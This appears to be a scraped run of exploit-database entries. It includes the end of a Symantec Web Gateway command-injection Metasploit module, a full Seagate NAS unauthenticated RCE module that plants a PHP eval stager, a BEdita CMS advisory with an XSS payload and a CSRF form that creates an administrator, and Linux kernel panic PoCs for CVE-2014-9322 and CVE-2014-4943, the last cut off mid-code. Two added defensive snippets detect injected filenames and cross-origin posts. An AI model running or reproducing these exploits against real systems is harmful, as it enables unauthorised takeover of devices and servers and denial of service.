  end

  def build_mime
    p = build_payload

    data = Rex::MIME::Message.new
    data.add_part("#{Time.now.to_i}", nil, nil, 'form-data; name="posttime"')
    data.add_part('maintenance', nil, nil, 'form-data; name="configuration"')
    data.add_part('', 'application/octet-stream', nil, 'form-data; name="licenseFile"; filename=""')
    data.add_part('24', nil, nil, 'form-data; name="raCloseInterval"')
    data.add_part('', nil, nil, 'form-data; name="restore"')
    data.add_part("#{Rex::Text.rand_text_alpha(4)}\n", 'text/plain', nil, "form-data; name=\"restore_file\"; filename=\"#{Rex::Text.rand_text_alpha(4)}.txt; #{p}\"")
    data.add_part('Restore', nil, nil, 'form-data; name="restoreFile"')
    data.add_part('0', nil, nil, 'form-data; name="event_horizon"')
    data.add_part('0', nil, nil, 'form-data; name="max_events"')
    data.add_part(Time.now.strftime("%m/%d/%Y"), nil, nil, 'form-data; name="cleanlogbefore"')
    data.add_part('', nil, nil, 'form-data; name="testaddress"')
    data.add_part('', nil, nil, 'form-data; name="pingaddress"')
    data.add_part('and', nil, nil, 'form-data; name="capture_filter_op"')
    data.add_part('', nil, nil, 'form-data; name="capture_filter"')

    data
  end

  def inject_exec(sid)
    uri = target_uri.path
    mime = build_mime # Payload inside
    send_request_cgi({
      'uri'     => normalize_uri(uri, 'spywall/restore.php'),
      'method'  => 'POST',
      'cookie'  => sid,
      'data'    => mime.to_s,
      'ctype'   => "multipart/form-data; boundary=#{mime.bound}",
      'headers' => {
        'Referer' => "#{protocol}://#{peer}#{normalize_uri(uri, 'spywall/mtceConfig.php')}"
      }
    })
  end

  def save_cred(username, password)
    service_data = {
      address: rhost,
      port: rport,
      service_name: protocol,
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: self.fullname,
      origin_type: :service,
      username: username,
      private_data: password,
      private_type: :password
    }.merge(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
      core: credential_core,
      last_attempted_at: DateTime.now,
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def exploit
    print_status("Getting the PHPSESSID...")
    sid = get_sid
    if sid.blank?
      print_error("Failed to get the session ID. Cannot continue with the login.")
      return
    end

    print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
    sid = login(sid)
    if sid.blank?
      print_error("Failed to get the session ID from the login process. Cannot continue with the injection.")
      return
    else
      # Good password, keep it
      save_cred(datastore['USERNAME'], datastore['PASSWORD'])
    end

    print_status("Trying restore.php...")
    inject_exec(sid)
  end

end
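Detection logic for the request shape this module sends to restore.php, as an added example (not Symantec's code and not part of the module above): it walks a multipart/form-data body and flags any uploaded filename that falls outside a strict allow-list, which is where the module places its command. The boundary, sample bodies, allow-list pattern and function names are constructed assumptions.

```python
import re

BOUNDARY = "constructed-boundary-1234"

# filename="..." inside a Content-Disposition header (escaped quotes tolerated)
FILENAME_RE = re.compile(r'filename="((?:\\.|[^"\\])*)"', re.IGNORECASE)
# the form field name; \b keeps this from matching inside "filename="
FIELD_RE = re.compile(r'\bname="([^"]*)"')
# Assumed policy: plain names only, no spaces, separators or shell metacharacters.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def upload_filenames(body, boundary):
    """Return (field, filename) for every part whose header carries a filename."""
    found = []
    for part in body.split(b"--" + boundary.encode("latin-1")):
        # headers end at the first blank line; the rest is the part's content
        head = part.split(b"\r\n\r\n", 1)[0].decode("latin-1")
        for line in head.split("\r\n"):
            if not line.lower().startswith("content-disposition:"):
                continue
            filename = FILENAME_RE.search(line)
            if filename:
                field = FIELD_RE.search(line)
                found.append((field.group(1) if field else "", filename.group(1)))
    return found


def suspicious_uploads(body, boundary):
    """Return the (field, filename) pairs that fail the allow-list."""
    flagged = []
    for field, filename in upload_filenames(body, boundary):
        if filename == "":
            continue  # browsers send an empty filename when no file is chosen
        if not SAFE_NAME.fullmatch(filename):
            flagged.append((field, filename))
    return flagged


def _part(disposition, content, ctype=None):
    head = "Content-Disposition: form-data; " + disposition + "\r\n"
    if ctype:
        head += "Content-Type: " + ctype + "\r\n"
    return "--" + BOUNDARY + "\r\n" + head + "\r\n" + content + "\r\n"


def sample_body(restore_filename):
    """Constructed request body with the same field names the module uses."""
    return (
        _part('name="configuration"', "maintenance")
        + _part('name="licenseFile"; filename=""', "", "application/octet-stream")
        + _part('name="restore_file"; filename="%s"' % restore_filename,
                "abcd\n", "text/plain")
        + _part('name="restoreFile"', "Restore")
        + "--" + BOUNDARY + "--\r\n"
    ).encode("latin-1")


if __name__ == "__main__":
    for name in ("backup-2015.tar.gz", "abcd.txt; id"):
        print(repr(name), "->", suspicious_uploads(sample_body(name), BOUNDARY))
```

The durable fix on the server side is to store the upload under a server-generated name and keep the client-supplied filename out of any command line.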
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rexml/document'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Seagate Business NAS Unauthenticated Remote Command Execution',
      'Description'    => %q{
        Some Seagate Business NAS devices are vulnerable to command execution via a local
        file include vulnerability hidden in the language parameter of the CodeIgniter
        session cookie. The vulnerability manifests in the way the language files are
        included in the code on the login page, and hence is open to attack from users
        without the need for authentication. The cookie can be easily decrypted using a
        known static encryption key and re-encrypted once the PHP object string has been
        modified.
        This module has been tested on the STBN300 device.
      },
      'Author'         => [
          'OJ Reeves <oj[at]beyondbinary.io>' # Discovery and Metasploit module
        ],
      'References'     => [
          ['CVE', '2014-8684'],
          ['CVE', '2014-8686'],
          ['CVE', '2014-8687'],
          ['EDB', '36202'],
          ['URL', 'http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/'],
          ['URL', 'https://beyondbinary.io/advisory/seagate-nas-rce/']
        ],
      'DisclosureDate' => 'Mar 01 2015',
      'Privileged'     => true,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Payload'        => {'DisableNops' => true},
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0,
      'License'        => MSF_LICENSE
      ))

    register_options([
        OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
        OptString.new('ADMINACCOUNT', [true, 'Name of the NAS admin account', 'admin']),
        OptString.new('COOKIEID', [true, 'ID of the CodeIgniter session cookie', 'ci_session']),
        OptString.new('XORKEY', [true, 'XOR Key used for the CodeIgniter session', '0f0a000d02011f0248000d290d0b0b0e03010e07'])
      ])
  end

  #
  # Write a string value to a serialized PHP object without deserializing it first.
  # If the value exists it will be updated.
  #
  def set_string(php_object, name, value)
    prefix = "s:#{name.length}:\"#{name}\";s:"
    if php_object.include?(prefix)
      # the value already exists in the php blob, so update it.
      return php_object.gsub("#{prefix}\\d+:\"[^\"]*\"", "#{prefix}#{value.length}:\"#{value}\"")
    end

    # the value doesn't exist in the php blob, so create it.
    count = php_object.split(':')[1].to_i + 1
    php_object.gsub(/a:\d+(.*)}$/, "a:#{count}\\1#{prefix}#{value.length}:\"#{value}\";}")
  end

  #
  # Findez ze holez!
  #
  def check
    begin
      res = send_request_cgi(
        'uri'      => normalize_uri(target_uri),
        'method'   => 'GET',
        'headers'  => {
          'Accept' => 'text/html'
        }
      )

      if res && res.code == 200
        headers = res.to_s

        # validate headers
        if headers.include?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
          # and make sure that the body contains the title we'd expect
          if res.body.include?('Login to BlackArmor')
            return Exploit::CheckCode::Appears
          end
        end
      end
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
      # something went wrong, assume safe.
    end

    Exploit::CheckCode::Safe
  end

  #
  # Executez ze sploitz!
  #
  def exploit

    # Step 1 - Establish a session with the target which will give us a PHP object we can
    # work with.
    begin
      print_status("Establishing session with target ...")
      res = send_request_cgi({
        'uri'    => normalize_uri(target_uri),
        'method' => 'GET',
        'headers'  => {
          'Accept' => 'text/html'
        }
      })

      if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/
        cookie_value = $1.strip
      else
        fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
      end
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
      fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
    end

    # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly
    # then update it so that it's an admin session before re-encrypting
    print_status("Upgrading session to administrator ...")
    php_object = decode_cookie(cookie_value)
    vprint_status("PHP Object: #{php_object}")

    admin_php_object = set_string(php_object, 'is_admin', 'yes')
    admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT'])
    vprint_status("Admin PHP object: #{admin_php_object}")

    admin_cookie_value = encode_cookie(admin_php_object)

    # Step 3 - Extract the current host configuration so that we don't lose it.
    host_config = nil

    # This time value needs to be consistent across calls
    config_time = ::Time.now.to_i

    begin
      print_status("Extracting existing host configuration ...")
      res = send_request_cgi(
        'uri'      => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'),
        'method'   => 'GET',
        'headers'  => {
          'Accept' => 'text/html'
        },
        'cookie'   => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
        'vars_get' => {
          '_'      => config_time
        }
      )

      if res && res.code == 200
        res.body.split("\r\n").each do |l|
          if l.include?('general_setup')
            host_config = l
            break
          end
        end
      else
        fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
      end
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
      fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
    end

    print_good("Host configuration extracted.")
    vprint_status("Host configuration: #{host_config}")

    # Step 4 - replace the host device description with a custom payload that can
    # be used for LFI. We have to keep the payload small because of size limitations
    # and we can't put anything in with '$' in it. So we need to make a simple install
    # payload which will write a required payload to disk that can be executed directly
    # as the last part of the payload. This will also be self-deleting.
    param_id = rand_text_alphanumeric(3)

    # There are no files on the target file system that start with an underscore
    # so to allow for a small file size that doesn't collide with an existing file
    # we'll just prefix it with an underscore.
    payload_file = "_#{rand_text_alphanumeric(3)}.php"

    installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));"
    stager = Rex::Text.encode_base64(installer)
    stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>")
    vprint_status("Stager: #{stager}")

    # Butcher the XML directly rather than attempting to use REXML. The target XML
    # parser is way too simple/flaky to deal with the proper stuff that REXML
    # spits out.
    desc_start = host_config.index('" description="') + 15
    desc_end = host_config.index('"', desc_start)
    xml_payload = host_config[0, desc_start] +
                  stager + host_config[desc_end, host_config.length]
    vprint_status(xml_payload)

    # Step 5 - set the host description to the stager so that it is written to disk
    print_status("Uploading stager ...")
    begin
      res = send_request_cgi(
        'uri'             => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
        'method'          => 'POST',
        'headers'         => {
          'Accept'        => 'text/html'
        },
        'cookie'          => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
        'vars_get'        => {
          '_'             => config_time
        },
        'vars_post'       => {
          'general_setup' => xml_payload
        }
      )

      unless res && res.code == 200
        fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
      end
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
      fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
    end

    print_good("Stager uploaded.")

    # Step 6 - Invoke the stage, passing in a self-deleting php script body.
    print_status("Executing stager ...")
    payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00")
    payload_cookie_value = encode_cookie(payload_php_object)
    self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>"
    errored = false

    begin
      res = send_request_cgi(
        'uri'      => normalize_uri(target_uri),
        'method'   => 'POST',
        'headers'  => {
          'Accept' => 'text/html'
        },
        'cookie'    => "#{datastore['COOKIEID']}=#{payload_cookie_value}",
        'vars_post' => {
          param_id  => Rex::Text.encode_base64(self_deleting_payload)
        }
      )

      if res && res.code == 200
        print_good("Stager execution succeeded, payload ready for execution.")
      else
        print_error("Stager execution failed (invalid result).")
        errored = true
      end
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
      print_error("Stager execution failed (unable to establish connection).")
      errored = true
    end

    # Step 7 - try to restore the previous configuration, allowing exceptions
    # to bubble up given that we're at the end. This step is important because
    # we don't want to leave a trail of junk on disk at the end.
    print_status("Restoring host config ...")
    res = send_request_cgi(
      'uri'             => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
      'method'          => 'POST',
      'headers'         => {
        'Accept'        => 'text/html'
      },
      'cookie'          => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
      'vars_get'        => {
        '_'             => config_time
      },
      'vars_post'       => {
        'general_setup' => host_config
      }
    )

    # Step 8 - invoke the installed payload, but only if all went to plan.
    unless errored
      print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
      res = send_request_cgi(
        'uri'      => normalize_uri(target_uri, payload_file),
        'method'   => 'GET',
        'headers'  => {
          'Accept' => 'text/html'
        },
        'cookie'   => "#{datastore['COOKIEID']}=#{payload_cookie_value}"
      )
    end
  end

  #
  # Take a CodeIgniter cookie and pull out the PHP object using the XOR
  # key that we've been given.
  #
  def decode_cookie(cookie_content)
    cookie_value = Rex::Text.decode_base64(URI.decode(cookie_content))
    pass = xor(cookie_value, datastore['XORKEY'])
    result = ''

    (0...pass.length).step(2).each do |i|
      result << (pass[i].ord ^ pass[i + 1].ord).chr
    end

    result
  end

  #
  # Take a serialised PHP object cookie value and encode it so that
  # CodeIgniter thinks it's legit.
  #
  def encode_cookie(cookie_value)
    rand = Rex::Text.sha1(rand_text_alphanumeric(40))

    block  = ''

    (0...cookie_value.length).each do |i|
      block << rand[i % rand.length]
      block << (rand[i % rand.length].ord ^ cookie_value[i].ord).chr
    end

    cookie_value = xor(block, datastore['XORKEY'])
    cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value))
    vprint_status("Cookie value: #{cookie_value}")

    cookie_value
  end

  #
  # XOR a value against a key. The key is cycled.
  #
  def xor(string, key)
    result = ''

    string.bytes.zip(key.bytes.cycle).each do |s, k|
      result << (s ^ k)
    end

    result
  end

  #
  # Simple XML substitution because the target XML handler isn't really
  # full blown or smart.
  #
  def xml_encode(str)
    str.gsub(/</, '&lt;').gsub(/>/, '&gt;')
  end

end
            
BEdita CMS - XSS & CSRF Vulnerability in Version 3.5.0

----------------------------------------------------------------

Product Information:

Software: BEdita CMS
Tested Version: 3.5.0, released 19.1.2015
Vulnerability Type: Cross-Site Scripting (CWE-79) & Cross-Site Request Forgery, CSRF (CWE-352)
Download link: http://www.bedita.com/download-bedita
Description: A software to create, manage content and organize it with semantic rules. (copied from http://www.bedita.com/what-is-bedita)

----------------------------------------------------------------

Issues:

1) XSS in newsletter mail group creation page.
2) CSRF in user creation page.

----------------------------------------------------------------

Vulnerability description:

1) XSS in newsletter mail group creation page

When an authenticated user of BEdita CMS is creating a newsletter mail group, the following POST request is sent to the server:

POST /bedita-3.5.0.corylus.2261e29/bedita/index.php/newsletter/saveMailGroups HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 523
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/newsletter/viewMailGroup/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: CAKEPHP=me57vjaqc2ts154qr342a6u6i2; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _ga=GA1.1.621011711.1425057132

data[MailGroup][id]=&data[MailGroup][group_name]=<script>alert(0)</script>&data[MailGroup][area_id]=1&data[MailGroup][visible]=1&data[MailGroup][security]=none&data[MailGroup][confirmation_in_message]=Hi [$user], 

your+subscription+is+now+active,+soon+you'll+receive+the "[$title]"+newsletter.&data[MailGroup][confirmation_out_message]=Hi [$user], 

you+have+been+unsubscribed+from "[$title]"

The parameter data[MailGroup][group_name] is vulnerable to XSS.

2) CSRF in user creation page

When an authenticated administrative user of BEdita CMS is creating a user, the following POST request is sent to the server:

POST /bedita-3.5.0.corylus.2261e29/bedita/index.php/users/saveUser HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 339
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/users/viewUser
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: CAKEPHP=me57vjaqc2ts154qr342a6u6i2; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _ga=GA1.1.621011711.1425057132

data[User][auth_type]=bedita&data[User][userid]=csrfadmin99&data[User][auth_params][userid]=&pwd=1qazXSW@&data[User][passwd]=1qazXSW@&data[User][realname]=csrfadmin99&data[User][email]=csrfadmin99@admin.com&data[User][valid]=1&groups=&data[groups][administrator]=on

By executing the following Proof-of-Concept, a new user called "csrfadmin99" will be created with the password "1qazXSW@".

<html>
<body>
<form action="http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/users/saveUser" method="POST">
<input type="hidden" name="data[User][auth_type]" value="bedita" />
<input type="hidden" name="data[User][userid]" value="csrfadmin99" />
<input type="hidden" name="pwd" value="1qazXSW@" />
<input type="hidden" name="data[User][passwd]" value="1qazXSW@" />
<input type="hidden" name="data[User][realname]" value="csrfadmin99" />
<input type="hidden" name="data[User][email]" value="csrfadmin99@admin.com" />
<input type="hidden" name="data[User][valid]" value="1" />
<input type="hidden" name="data[groups][administrator]" value="on" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

----------------------------------------------------------------

Impact:

1) An attacker can leverage the XSS vulnerability to exploit users of BEdita. An example would be to inject malicious JavaScript code in order to use attacking tools like BeEF.
2) An attacker is able to create a user account with administrator privilege.

----------------------------------------------------------------

Solution:

Update to the latest version, which is 3.5.1, see https://groups.google.com/forum/?fromgroups#!topic/bedita/SOYrl5C-YRg
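
A server-side same-origin check that would refuse the forged saveUser form post shown above, as an added example (this is not BEdita code and not the 3.5.1 fix). The sample requests are constructed from the request in this advisory; `other-site.example` and the allowed-origin set are assumptions, and such a check complements a per-session anti-CSRF token rather than replacing it.

```python
"""Added example: same-origin check for state-changing requests (not BEdita code)."""
from urllib.parse import urlsplit

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), target, headers, body


def claimed_origin(headers):
    """Origin reported by the browser: the Origin header, else the origin of Referer."""
    value = headers.get("origin") or headers.get("referer")
    if not value:
        return None
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return None  # also covers "Origin: null" (sandboxed or file:// pages)
    return f"{parts.scheme}://{parts.netloc}".lower()


def check_same_origin(raw, allowed_origins):
    """Return (allowed, reason) for one raw request."""
    method, _target, headers, _body = parse_request(raw)
    if method not in STATE_CHANGING:
        return True, "safe method"
    origin = claimed_origin(headers)
    if origin is None:
        return False, "no usable Origin/Referer"
    if origin not in allowed_origins:
        return False, f"cross-origin request from {origin}"
    return True, "same origin"


# Constructed samples: the advisory's request, trimmed to the relevant headers.
ALLOWED = {"http://127.0.0.1"}
LEGIT = (
    "POST /bedita-3.5.0.corylus.2261e29/bedita/index.php/users/saveUser HTTP/1.1\n"
    "Host: 127.0.0.1\n"
    "Origin: http://127.0.0.1\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "data[User][userid]=csrfadmin99&data[groups][administrator]=on"
)
# What a browser sends when the same form is hosted on another site (assumed host).
FORGED = LEGIT.replace("Origin: http://127.0.0.1", "Origin: http://other-site.example")
# The form opened from a local file or a sandboxed frame.
NULL_ORIGIN = LEGIT.replace("Origin: http://127.0.0.1", "Origin: null")
# Both headers stripped, e.g. by a privacy proxy.
NO_ORIGIN = LEGIT.replace("Origin: http://127.0.0.1\n", "")

if __name__ == "__main__":
    for label, raw in [("legit", LEGIT), ("forged", FORGED),
                       ("null", NULL_ORIGIN), ("missing", NO_ORIGIN)]:
        print(label, check_same_origin(raw, ALLOWED))
```
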

----------------------------------------------------------------

Timeline:

Vulnerability found: 11.2.2015
Vendor informed: 11.2.2015
Response by vendor: 11.2.2015
Fix by vendor: 19.2.2015
Public Advisory: 1.3.2015

----------------------------------------------------------------

References:
https://github.com/bedita/bedita/issues/591
https://github.com/bedita/bedita/issues/597

----------------------------------------------------------------
            
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-9322_poc.c
 * 
 * arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
 * properly handle faults associated with the Stack Segment (SS) segment
 * register, which allows local users to gain privileges by triggering an IRET
 * instruction that leads to access to a GS Base address from the wrong space.
 * 
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 * 
 * I have no merit in writing this poc, I just implemented the first part of Rafal Wojtczuk's article (this guy is a genius!)
 * More info at : http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
 * 
 * 
 * Compile with gcc -fno-stack-protector -Wall -o cve-2014-9322_poc cve-2014-9322_poc.c  -lpthread
 * 
 * Emeric Nasi - www.sevagas.com
 *-----------------------------------------------------------------------------------------------------*/
 
  // Only works on x86_64 platform
 #ifdef __x86_64__
 
/* -----------------------   Includes ----------------------------*/
#define _GNU_SOURCE
#include <stdio.h> 
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <asm/ldt.h>
#include <pthread.h>
#include <sys/time.h>
#include <inttypes.h>
#include <stdbool.h>
#include <errno.h>
#include <sys/user.h>



/* -----------------------   definitions ----------------------------*/


#define TARGET_KERNEL_MIN "3.0.0"
#define TARGET_KERNEL_MAX "3.17.4"
#define EXPLOIT_NAME "cve-2014-9322"
#define EXPLOIT_TYPE DOS


#define FALSE_SS_BASE  0x10000UL
#define MAP_SIZE    0x10000


/* -----------------------   Global variables ----------------------------*/


struct user_desc new_stack_segment;


/* -----------------------   functions ----------------------------*/


/**
 * Creates a new segment in Local Descriptor Table
 */
static bool add_ldt(struct user_desc *desc, const char *name)
{
  if (syscall(SYS_modify_ldt, 1, desc, sizeof(struct user_desc)) == 0) 
  {
    return true;
  } 
  else 
  {
    printf("[cve_2014_9322 error]: Failed to create %s segment\n", name);
    printf("modify_ldt failed, %s\n", strerror(errno));
    return false;
  }
}


int FLAG = 0;

void * segManipulatorThread(void * none)
{
  new_stack_segment.entry_number    = 0x12;
  new_stack_segment.base_addr       = 0x10000;
  new_stack_segment.limit           = 0xffff;
  new_stack_segment.seg_32bit       = 1;
  new_stack_segment.contents        = MODIFY_LDT_CONTENTS_STACK; /* Data, grow-up */
  new_stack_segment.read_exec_only  = 0;
  new_stack_segment.limit_in_pages  = 0;
  new_stack_segment.seg_not_present = 0;
  new_stack_segment.useable         = 0;
  new_stack_segment.lm = 0;
  
  // Create a new stack segment
  add_ldt(&new_stack_segment, "newSS");
  
  // Wait for main thread to use new stack segment
  sleep(3);  

  // Invalidate stack segment 
  new_stack_segment.seg_not_present = 1;
  add_ldt(&new_stack_segment, "newSS disable");
  FLAG = 1;
  sleep(15);
  
  return NULL;
}

/**
 * DOS poc for cve_2014_9322 vulnerability
 */
int main()
{

  pthread_t thread1;
  uint8_t *code;
  
  printf("[cve_2014_9322]: Preparing to exploit.\n");
  
  // map area for false SS
  code = (uint8_t *)mmap((void *)FALSE_SS_BASE, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON|MAP_PRIVATE, -1, 0);
  if (code != (uint8_t *) FALSE_SS_BASE) 
  {
    fprintf(stderr, "[cve_2014_9322 Error]: Unable to map memory at address: %lu\n", FALSE_SS_BASE);
    return -1;
  }
   
    printf("[cve_2014_9322]:  Panic!\n");
  if(pthread_create(&thread1, NULL, segManipulatorThread, NULL)!= 0)
  {
    perror("[cve_2014_9322 error]: pthread_create");
    return -1;
  }
  
  // Wait for segManipulatorThread to create new stack segment
  sleep(1);

    // Set  stack segment to newly created one in segManipulatorThread
  asm volatile ("mov %0, %%ss;"
    :        
    :"r" (0x97)
  );
  
  while(FLAG == 0){};
  sleep(4);

  return 0;
}


#endif // __x86_64__
            
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-4943_poc.c
 * 
 * The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure 
 * differences between an l2tp socket and an inet socket. 
 * 
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 * I have tried to exploit this vulnerability and I am sure there is a way (or several) to elevate privileges.
 * There are some kernel structures that can be overwritten but I didn't manage to find the ultimate trick to at least point back to userland.
 * It seems guys at Immunity found a way using a race condition.
 *
 * 
 * Compile with gcc -fno-stack-protector -Wall -o cve-2014-4943_poc cve-2014-4943_poc.c  
 * 
 * Emeric Nasi - www.sevagas.com
 *-----------------------------------------------------------------------------------------------------*/
 

 
/* -----------------------   Includes ----------------------------*/

#include <netinet/ip.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <linux/net.h>
#include <linux/udp.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <linux/if_pppol2tp.h>


/* -----------------------   Definitions ----------------------------*/

#define TARGET_KERNEL_MIN "3.2.0"
#define TARGET_KERNEL_MAX "3.15.6"
#define EXPLOIT_NAME "cve-2014-4943"



/* -----------------------   functions ----------------------------*/


/**
 * It is possible to modify several parts of socket object using IP options from UDP setsockopt
 * For this POC, IP_OPTIONS is the easiest way to panic kernel
 */
void modifyUDPvalues(int tunnel_fd)
{
/* Extract from kernel code which is vulnerable, here you can see that both udp_setsockopt and ip_setsockopt (on inet_sock) can be used to leverage vulnerability:
  
 int udp_setsockopt(struct sock *sk, int level, int optname,
                    char __user *optval, unsigned int optlen)
 {
         if (level == SOL_UDP  ||  level == SOL_UDPLITE)
                 return udp_lib_setsockopt(sk, level, optname, optval, optlen,
                                           udp_push_pending_frames);
         return ip_setsockopt(sk, level, optname, optval, optlen);
 }
*/
  
  int ip_options = 0x1;
     
  if (setsockopt(tunnel_fd, SOL_IP,  IP_OPTIONS, &ip_options, 20) == -1) 
    {
        perror("setsockopt (IP_OPTIONS)");   
    }
}


/**
 * DOS poc for cve_2014_4943 vulnerability
 */
int main()
{

  int tunnel_fd;
  int tunnel_fd2;
  int udp_fd;

  printf("[cve_2014_4943]: Preparing to exploit.\n");

  /* Create first L2TP socket */
  tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
  if (tunnel_fd < 0)
  {
    perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
    return -1;
  }
  /* Create second L2TP socket */
  tunnel_fd2 = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
  if (tunnel_fd2 < 0)
  {
    perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
    return -1;
  }
  if ((udp_fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) 
  {
    perror("cannot create socket"); 
    return -1; 
  }
  
  /* Connect L2TP socket */
  struct sockaddr_pppol2tp sax;

  memset(&sax, 0, sizeof(sax));
  sax.sa_family = AF_PPPOX;
  sax.sa_protocol = PX_PROTO_OL2TP;
  sax.pppol2tp.fd = udp_fd;       /* fd of tunnel UDP socket */
